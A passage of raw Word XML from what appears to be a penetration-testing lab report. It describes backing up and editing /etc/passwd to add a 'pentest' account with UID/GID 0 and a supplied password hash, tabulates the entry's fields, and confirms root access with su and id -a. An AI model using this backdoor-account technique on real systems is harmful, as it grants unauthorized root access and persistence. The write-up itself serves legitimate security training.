        <w:spacing w:after="24" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684CE3D5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="2" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CD5F5B" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="277" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="9570" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D0255D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 14 shows the passwd1 file opened in the Nano text editor after creating a backup copy of the original /etc/passwd file. A new user entry named pentest has been added at the bottom of the file. The entry includes the previously generated password hash and specifies a UID and GID of 0, which correspond to root-level privileges. The account is configured with /root as the home directory and /bin/bash as the default shell. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31362B91" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="3361" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7EB846" wp14:editId="07703A4A">
            <wp:extent cx="3943350" cy="2628519"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2321" name="Picture 2321"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2321" name="Picture 2321"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3943350" cy="2628519"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063217CC" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 14: Adding a New Root-Level User Entry to the Modified passwd File </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC7907A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table 1 shows the breakdown of the seven fields that make up an entry in the /etc/passwd file. Each field is separated by a colon and contains specific information about a user account, including the username, password hash, user ID (UID), group ID (GID), user description, home directory, and default login shell. Understanding this structure is important because modifying these fields correctly allows a new user account to be created on the system </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9352" w:type="dxa"/>
        <w:tblInd w:w="5" w:type="dxa"/>
        <w:tblCellMar>
          <w:top w:w="5" w:type="dxa"/>
          <w:left w:w="108" w:type="dxa"/>
          <w:bottom w:w="0" w:type="dxa"/>
          <w:right w:w="59" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1392"/>
        <w:gridCol w:w="3704"/>
        <w:gridCol w:w="4256"/>
      </w:tblGrid>
      <w:tr w:rsidR="00582E80" w14:paraId="5B95E2D3" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="511"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="64FE67F8" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Position </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0EE77228" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Component </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="601332EF" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Example </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="6D36543A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="202B96FD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="434C35B0" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Username </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5DB4693E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Pentest </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="62AB0504" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="584A13B4" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2CE2CA1E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Encrypted/Hashed Password </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="13709FB1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">$1$pentest$NPv8jf8/11WqNhXAriGwa. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="771D48C0" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="55EC61BD" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">3 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="686E7017" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">User ID </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6FCF19CA" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="24881D6F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="511"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="397CDD05" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">4 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0637D89E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Group ID </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="277DEA09" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="63DC15F4" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14DDEDB7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="20F53669" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">User’s full name </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A352512" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Root </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="1FE07320" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D431992" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">6 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6238A70A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">User’s Home Directory </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="326D22E5" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">/root </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00582E80" w14:paraId="30FE1C8B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="509"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1392" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="00AD547E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">7 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="148F0C4A" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Default Login shell </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4256" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4ED7344C" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">/bin/bash </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F99C2E3" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 1: The seven components of an /etc/passwd /entry </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D62F64" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="183" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5009E" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="256"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure 15 shows shows the successful login to the newly created pentest user account using the su pentest command. After switching to this account, the id -a command is executed to verify the user’s privileges. The output confirms that the pentest account has root-level permissions. The screenshot also demonstrates switching back to the original user piccolo and then logging in again as pentest, where the password is requested and accepted. Running id -a again confirms that the account continues to operate with full root privileges. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B559FD1" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="2249" w:firstLine="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7778D430" wp14:editId="71713530">
            <wp:extent cx="4647057" cy="1816735"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2377" name="Picture 2377"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="2377" name="Picture 2377"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4647057" cy="1816735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE0D67D" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="48" w:line="268" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure 15: Switching to the Pentest User and Verifying Root Privilege </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529150C7" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="60" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD4B431" w14:textId="77777777" w:rsidR="00582E80" w:rsidRDefault="00000000">
